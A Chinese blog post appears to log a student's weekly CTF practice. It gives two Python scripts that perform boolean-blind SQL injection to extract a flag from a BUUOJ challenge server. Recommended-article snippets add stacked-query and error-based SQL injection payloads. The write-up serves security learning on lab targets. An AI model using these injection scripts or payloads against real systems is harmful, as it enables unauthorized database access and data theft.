Web安全学习新手入门Week11

最新推荐文章于 2022-05-10 21:07:59 发布
最新推荐文章于 2022-05-10 21:07:59 发布
阅读量2.9k 收藏 1
点赞数
文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59271033/article/details/124382254
版权

这周自己找题打 总结总结 要回学校了

1.[CISCN2019 华北赛区 Day2 Web1]Hack World

开局告诉表和字段

然后题目之前说是uuid(uuid是32位随机字符串) 就想到要写脚本来解

输入1 回显有他想要个女朋友

输入2回显要不要做他女朋友

输入0是error啥的

就想到布尔盲注

那就先判断flag长度

import requests
 
url = "http://761df7bf-b293-4bf9-8319-d49755ef57af.node4.buuoj.cn:81/index.php"
len = 1;
while(True):
    data = {"id": f"if(length((select(flag)from(flag)))={len},1,0)"}
    r = requests.post(url,data=data)
    if('Hello, glzjin wants a girlfriend.' in r.text):
        break;
    print(len,end='\n')
    len += 1
print(f"flag长度为{len}")

 然后就上脚本

import requests
import time
import re
url='http://761df7bf-b293-4bf9-8319-d49755ef57af.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
    max = 126
    min = 33
    for c in range(33,126):
        s = (int)((max+min)/2)
        payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(1)
        if 'Hello, glzjin wants a girlfriend.' in str(r.text):
            max=s
        else:
            min=s
        if((max-min)<=1):
            flag+=chr(max)
            break
print(flag)

 2.[GXYCTF2019]BabySQli

上来是登录框 输入闭合的一些语句没有法

然后就用admin试试

然后看见一些绿绿的

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
程序设计入门—Python-week11
08-03
1.计算机为什么采用二进制,而非十进制作为数制的基础 2.Python 语言为什么被称为高级程序设计语言 3.下列 Python 程序,没有错误的是 4.关于
buuctf(探险2)
qq_62046696的博客
08-08 838
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
[GYCTF2020]Blacklist 使用handler函数进行sql堆注入
EC_Carrot的博客
10-26 381
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考了高诺琪师傅的文章:https://www.cnblogs.com/gaonuoqi/p/12398554.html 一、收集信息 过滤了很多东西,过滤了prepare预编译用不了,过滤了alter也是用不了改表、列名。 但可以查看一下表名 1';show tables;# 有两个表,查看一下FlagH
BUU 刷题小记录
qq_53142368的博客
08-30 176
文章目录前言一、Blacklist二、[RoarCTF 2019]Easy Java三、[GXYCTF2019]禁止套娃 前言 一、Blacklist return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 用这个语句查看过滤 发现过滤了这些 过滤了select 堆叠注入 1’;show tables;%23 1’;show columns from FlagHere; %23 由于过滤了prepare和a
[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入、handler绕过)
笑花大王
02-23 770
简介 今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊 晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。 原题复现: 考察知识点:SQL注入漏洞-堆叠注入、注入绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台...
buuctf web
CyhDl666的博客
02-01 896
文章目录[GYCTF2020]Blacklist[ZJCTF 2019]NiZhuanSiWei[CISCN2019 华北赛区 Day2 Web1]Hack World [GYCTF2020]Blacklist 注入题 先输入’页面返回报错确定闭合方式 直接准备union注入1' union select 1,2# 返回一个正则表达式return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./
web week one
01-20
web week one 任务 1.安装phpstudy,python,JAVA(jdk8)并配置好相关的环境,安装常用工具burpsuit,kali等; 2.学习HTTP协议(请求与响应),学习利用burpsuite 实现简单的抓包改包; 3.掌握PHP的基本语法、数据...
机器学习代码week1
最新发布
02-29
机器学习代码week1
08-结构化机器学习项目week11
08-04
08-结构化机器学习项目week11
Java学习心得-Week2
01-20
这周是第二周的学习,基本进入了正轨,老师讲课的节奏我可以适应了,每天上课前老师都会带我们进行归纳复习,并且讲解之前有疑问的问题,我能充分理解课后习题和知识。 这周讲了嵌套循环、函数、递归、数组和面向...
MySQL 数据库 ALTER命令讲解
12-15
MySQL 为关系型数据库(Relational Database Management System), 这种所谓的”关系型”可以理解为”表格”的概念, 一个关系型数据库由一个或数个表格组成。 当我们需要修改数据表名或者修改数据表字段时,就需要使用到MySQL ALTER命令。 开始本章教程前让我们先创建一张表,表名为:testalter_tbl。 root@host# mysql -u root -p password; Enter password:******* mysql> use TUTORIALS; Database changed mysql> create table te
[GYCTF2020]Blacklist&&[强网杯 2019]随便注
uihijio的博客
05-06 452
因为2020blacklist是2019随便注的升级版,所以借着这个机会归纳一下 先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。 blacklist比随便注多过滤了set,prepare,rename,alter。 过滤prepare,set是避免pdo预处理绕过 过滤rename,alter是避免修改表名的情况出现 而blacklist和随便注还有一种方法是handler...
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1343
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
BUUCTF寒假刷题-Web
热门推荐
Braindance
02-28 6万+
寒假横向刷题(尽量) BUUCTF 2021.01.15 [HCTF 2018]WarmUp 进到靶机一个硕大的滑稽,查看源码有提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
[强网杯2019]随便注(初学者看过来)
xiaobu30的博客
11-15 5060
这是一道web方向的sql注入的题目,通过借鉴各位大佬的博客,我给大家分享我学到的几种方法。 查询 “1” 的时候,会有回显 使用单引号闭合,尝试 “1' and 1 = 2#” (可以将这个理解为万能密码,#会将后面的语句注释掉) , 发现无回显 仅使用单引号注入发现会报sql语法错误 第一种: ...
2021-07-19 [De1CTF 2019]SSRF Me 知识点:SSRF Flask MD5 local_file
m0_51326092的博客
07-19 669
111
[De1CTF 2019]SSRF Me--python的代码审计
cainiao17441898的博客
05-31 227
解题: 整理一下python源码。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) sec
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3940
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2450
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
深度学习week1-RNN心脏病预测
07-27
你好!对于心脏病预测的问题,使用循环神经网络(RNN)是一种常见的方法。RNN适用于处理序列数据,而心电图信号就是一种序列数据。在使用RNN进行心脏病预测时,你可以将心电图信号作为输入序列,然后通过训练RNN模型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值